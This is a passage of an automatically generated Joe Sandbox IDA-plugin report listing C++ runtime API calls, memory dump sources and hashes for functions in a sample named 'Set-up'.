                                                                                              • API String ID: 2983387924-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C839
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2C861
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sputbackc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP100(?,00000001,?,00000014), ref: 6BC2C880
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2C89F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: D@std@@@std@@U?$char_traits@$H_prolog3_catchU?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@?sputbackc@?$basic_streambuf@Ipfx@?$basic_istream@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2694087394-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C907
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2C92F
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sungetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000001,?,00000014), ref: 6BC2C94B
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2C96A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: D@std@@@std@@U?$char_traits@$H_prolog3_catchU?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@?sungetc@?$basic_streambuf@Ipfx@?$basic_istream@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2027688421-0
                                                                                              • Opcode ID: c39a57dfdbb4a8e7eb58eb7979d1e3726bae4566607cf29259c1a94b5139975a
                                                                                              • Instruction ID: 3588b174e83042615cfd3c1e87cab4e7f3a2beeb8b933283032e224709b83b7f
                                                                                              • Opcode Fuzzy Hash: c39a57dfdbb4a8e7eb58eb7979d1e3726bae4566607cf29259c1a94b5139975a
                                                                                              • Instruction Fuzzy Hash: 93019270D15249CFCB10DFA8C9919ADFBB1BF88318F50815DD1A6A73A1D7389B01DB90
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC19EB5
                                                                                              • ??0_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100(00000004,6BC16E5C,?,00000000,6BC16418,?,00000008), ref: 6BC19EFB
                                                                                              • ??0_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19F13
                                                                                              • ??0_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19F33
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0_Concurrency@@Lock@details@Reentrant$H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 62913154-0
                                                                                              • Opcode ID: 0cd602f4d5baf6b274713b0642ca2edca1f952c410149c3af0465086a5e49e96
                                                                                              • Instruction ID: fcfc2bcf7725e00b9bc31d1d82cf81162d066eb550996ebe6be089c12d3a2641
                                                                                              • Opcode Fuzzy Hash: 0cd602f4d5baf6b274713b0642ca2edca1f952c410149c3af0465086a5e49e96
                                                                                              • Instruction Fuzzy Hash: 8111D2B4801B46DFC724CF69C195289FBF0FF19310B908A6EC49A9BB40E774A654CF90
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1AA1F
                                                                                                • Part of subcall function 6BC1AB2C: __EH_prolog3.LIBCMT ref: 6BC1AB33
                                                                                                • Part of subcall function 6BC1AB2C: ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C,6BC1A716,00000014,6BC1A63D,?), ref: 6BC1AB41
                                                                                                • Part of subcall function 6BC1AB2C: ?set@event@Concurrency@@QAEXXZ.MSVCR100 ref: 6BC1ABAB
                                                                                                • Part of subcall function 6BC1AB2C: ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1ABB8
                                                                                              • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(00000014), ref: 6BC1AA4C
                                                                                              • ??1critical_section@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1AA7A
                                                                                              • ??1event@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1AA87
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$H_prolog3Lock@details@ReentrantScoped_lock@_Spin$??0_??1_??1critical_section@??1event@?set@event@Once@?$_V123@@Wait@$00@details@
                                                                                              • String ID:
                                                                                              • API String ID: 1356037114-0
                                                                                              • Opcode ID: dfae11a6f9b35c92d7bc8ee69f43b8405d2a6f253b1fd24c965d1b4adc0f155b
                                                                                              • Instruction ID: 807c712f155e1623c60ccf6fc5669c24d76ec2a191dfa957be8ac70c2ab5f9f4
                                                                                              • Opcode Fuzzy Hash: dfae11a6f9b35c92d7bc8ee69f43b8405d2a6f253b1fd24c965d1b4adc0f155b
                                                                                              • Instruction Fuzzy Hash: 36019E34625315CFDB10CFA5C11579DBBB0BF15708F50805CE496A7640E7789708DB21
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC19DB4
                                                                                              • ??1critical_section@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19E03
                                                                                              • ??1critical_section@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19E0F
                                                                                              • ??3@YAXPAX@Z.MSVCR100 ref: 6BC19E22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1critical_section@Concurrency@@$??3@H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 441831883-0
                                                                                              • Opcode ID: 89507d57f4be0ffb0f4dd49bd3305124ff067ff258f4dd53e1bbac1b1a41c990
                                                                                              • Instruction ID: 82d76894538bb67702030384d17930e5be29df17d1c514ac8bb445003f9642fe
                                                                                              • Opcode Fuzzy Hash: 89507d57f4be0ffb0f4dd49bd3305124ff067ff258f4dd53e1bbac1b1a41c990
                                                                                              • Instruction Fuzzy Hash: 5501F274119244CBC715DF78C1467DDBBB0BF52314F10409CD4AA6B281DBB86B41EB91
                                                                                              APIs
                                                                                              • ?_Init@ios_base@std@@IAEXXZ.MSVCP100 ref: 6BC21995
                                                                                                • Part of subcall function 6BC1D26C: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,?,00000000,00000000), ref: 6BC1D29C
                                                                                                • Part of subcall function 6BC1D26C: ??2@YAPAXI@Z.MSVCR100(00000004,?,?,00000000,00000000), ref: 6BC1D2A3
                                                                                                • Part of subcall function 6BC1D26C: std::locale::locale.LIBCPMT ref: 6BC1D2B0
                                                                                              • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP100(00000020), ref: 6BC219A8
                                                                                                • Part of subcall function 6BC2181B: __EH_prolog3.LIBCMT ref: 6BC21822
                                                                                                • Part of subcall function 6BC2181B: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000004), ref: 6BC2182B
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000), ref: 6BC219C1
                                                                                                • Part of subcall function 6BC1CD83: _CxxThrowException.MSVCR100(6BC1174C,6BC4CA2C), ref: 6BC1CDA4
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100(6BC1174C,6BC4CA2C), ref: 6BC1CDB1
                                                                                                • Part of subcall function 6BC1CD83: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6BC12E14), ref: 6BC1CDC6
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDE8
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDF8
                                                                                              • std::ios_base::_Addstd.LIBCPMT ref: 6BC219CD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?iostream_category@std@@Verror_category@1@$?clear@ios_base@std@@$??0exception@std@@??2@?getloc@ios_base@std@@?widen@?$basic_ios@AddstdD@std@@@std@@ExceptionH_prolog3Init@ios_base@std@@ThrowU?$char_traits@Vlocale@2@std::ios_base::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 2357300069-0
                                                                                              • Opcode ID: 8bbc491330479dad718dbffd002b7a2e0d6bd7c9cb6c3b6a85b10d531a97a336
                                                                                              • Instruction ID: ba9d2bcadc154d7f5b07736db7ef3b1bfab5bf7918411a55e41852546fc7c54b
                                                                                              • Opcode Fuzzy Hash: 8bbc491330479dad718dbffd002b7a2e0d6bd7c9cb6c3b6a85b10d531a97a336
                                                                                              • Instruction Fuzzy Hash: 69F0E5312247606BE730A77DD482B4B7BE8AB40625F00481EE4965BA80EBBEF64087D4
                                                                                              APIs
                                                                                              • ?_Init@ios_base@std@@IAEXXZ.MSVCP100 ref: 6BC268FA
                                                                                                • Part of subcall function 6BC1D26C: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,?,00000000,00000000), ref: 6BC1D29C
                                                                                                • Part of subcall function 6BC1D26C: ??2@YAPAXI@Z.MSVCR100(00000004,?,?,00000000,00000000), ref: 6BC1D2A3
                                                                                                • Part of subcall function 6BC1D26C: std::locale::locale.LIBCPMT ref: 6BC1D2B0
                                                                                              • ?widen@?$basic_ios@GU?$char_traits@G@std@@@std@@QBEGD@Z.MSVCP100(00000020), ref: 6BC2690D
                                                                                                • Part of subcall function 6BC268AD: __EH_prolog3.LIBCMT ref: 6BC268B4
                                                                                                • Part of subcall function 6BC268AD: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000004), ref: 6BC268BD
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000), ref: 6BC26927
                                                                                                • Part of subcall function 6BC1CD83: _CxxThrowException.MSVCR100(6BC1174C,6BC4CA2C), ref: 6BC1CDA4
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100(6BC1174C,6BC4CA2C), ref: 6BC1CDB1
                                                                                                • Part of subcall function 6BC1CD83: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6BC12E14), ref: 6BC1CDC6
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDE8
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDF8
                                                                                              • std::ios_base::_Addstd.LIBCPMT ref: 6BC26933
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?iostream_category@std@@Verror_category@1@$?clear@ios_base@std@@$??0exception@std@@??2@?getloc@ios_base@std@@?widen@?$basic_ios@AddstdExceptionG@std@@@std@@H_prolog3Init@ios_base@std@@ThrowU?$char_traits@Vlocale@2@std::ios_base::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 1147172176-0
                                                                                              • Opcode ID: 4a93c5219eda027f76f056229a4862a7d4b67af2e46ccb3538d82f2904040ed6
                                                                                              • Instruction ID: 007e5d793f9dd084ae9e892e5dcf8e6544be53f0efa2f36c6826c4cf8bd7163e
                                                                                              • Opcode Fuzzy Hash: 4a93c5219eda027f76f056229a4862a7d4b67af2e46ccb3538d82f2904040ed6
                                                                                              • Instruction Fuzzy Hash: F9F0EC31224B106BD730AB758442B4777D4AF40724F00441EE4555B580EF7DF640C794
                                                                                              APIs
                                                                                              • ?_Init@ios_base@std@@IAEXXZ.MSVCP100 ref: 6BC2681C
                                                                                                • Part of subcall function 6BC1D26C: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,?,00000000,00000000), ref: 6BC1D29C
                                                                                                • Part of subcall function 6BC1D26C: ??2@YAPAXI@Z.MSVCR100(00000004,?,?,00000000,00000000), ref: 6BC1D2A3
                                                                                                • Part of subcall function 6BC1D26C: std::locale::locale.LIBCPMT ref: 6BC1D2B0
                                                                                              • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QBE_WD@Z.MSVCP100(00000020), ref: 6BC2682F
                                                                                                • Part of subcall function 6BC267AE: __EH_prolog3.LIBCMT ref: 6BC267B5
                                                                                                • Part of subcall function 6BC267AE: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000004), ref: 6BC267BE
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000), ref: 6BC26849
                                                                                                • Part of subcall function 6BC1CD83: _CxxThrowException.MSVCR100(6BC1174C,6BC4CA2C), ref: 6BC1CDA4
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100(6BC1174C,6BC4CA2C), ref: 6BC1CDB1
                                                                                                • Part of subcall function 6BC1CD83: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6BC12E14), ref: 6BC1CDC6
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDE8
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDF8
                                                                                              • std::ios_base::_Addstd.LIBCPMT ref: 6BC26855
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?iostream_category@std@@Verror_category@1@$?clear@ios_base@std@@$??0exception@std@@??2@?getloc@ios_base@std@@?widen@?$basic_ios@_AddstdExceptionH_prolog3Init@ios_base@std@@ThrowU?$char_traits@_Vlocale@2@W@std@@@std@@std::ios_base::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 408107686-0
                                                                                              • Opcode ID: 1e342b6411303b72b27934ec78aa33dac28bdab166b0d0df455a8513e2cd3bd5
                                                                                              • Instruction ID: bab57ef0f238b54e19c4c3b59d0c1208b7e138d24b20ceeff5a1ad2e383fb684
                                                                                              • Opcode Fuzzy Hash: 1e342b6411303b72b27934ec78aa33dac28bdab166b0d0df455a8513e2cd3bd5
                                                                                              • Instruction Fuzzy Hash: 59F02331624B1067D7309775C445B4777D4AF40728F00442EF0455B990EBBDF640C7E4
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25B0C
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(00000000,?,?,00000028), ref: 6BC25B34
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,?,?,00000028), ref: 6BC25B3F
                                                                                                • Part of subcall function 6BC233A5: _Getcvt.MSVCP100(00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?), ref: 6BC233AD
                                                                                                • Part of subcall function 6BC233A5: ?_Gettnames@_Locinfo@std@@QBE?AV_Timevec@2@XZ.MSVCP100(?,00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F), ref: 6BC233BF
                                                                                                • Part of subcall function 6BC233A5: free.MSVCR100 ref: 6BC233CF
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,00000028), ref: 6BC25B47
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtGettnames@_Init@?$time_put@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowTimevec@2@U?$char_traits@_V12@V12@@V?$ostreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 3973935344-0
                                                                                              • Opcode ID: fb7a832357c66fc3b3fac837548ed73f67305298c58e74a6563461d2dcf99259
                                                                                              • Instruction ID: d128918539791d72d23e1dff30e7dbde99259402706fe5dccc50dd7c835ef5b4
                                                                                              • Opcode Fuzzy Hash: fb7a832357c66fc3b3fac837548ed73f67305298c58e74a6563461d2dcf99259
                                                                                              • Instruction Fuzzy Hash: D5F0A075926108EBDB10DFA4C50178CBBF0BF50709F10C01DA055A7240EB7C5B05CB90
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25A27
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,?,?,00000028), ref: 6BC25A51
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(?,?,?,00000028), ref: 6BC25A5C
                                                                                                • Part of subcall function 6BC233A5: _Getcvt.MSVCP100(00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?), ref: 6BC233AD
                                                                                                • Part of subcall function 6BC233A5: ?_Gettnames@_Locinfo@std@@QBE?AV_Timevec@2@XZ.MSVCP100(?,00000000,?,6BC259FA,00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F), ref: 6BC233BF
                                                                                                • Part of subcall function 6BC233A5: free.MSVCR100 ref: 6BC233CF
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,00000028), ref: 6BC25A64
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtGettnames@_Init@?$time_put@_Locinfo@2@@Locinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowTimevec@2@U?$char_traits@_V12@V12@@V?$ostreambuf_iterator@_W@std@@@std@@@std@@std::_
                                                                                              • String ID:
                                                                                              • API String ID: 3973935344-0
                                                                                              • Opcode ID: 2cdca3787742f2b564648de4e4cb7efa2bb693a3050a7179a62b5a33bfdb0fb1
                                                                                              • Instruction ID: c142b37c360338ab87a3e2d7e4b7d50e4b9616389a3ef77fbaf9d7091c95571e
                                                                                              • Opcode Fuzzy Hash: 2cdca3787742f2b564648de4e4cb7efa2bb693a3050a7179a62b5a33bfdb0fb1
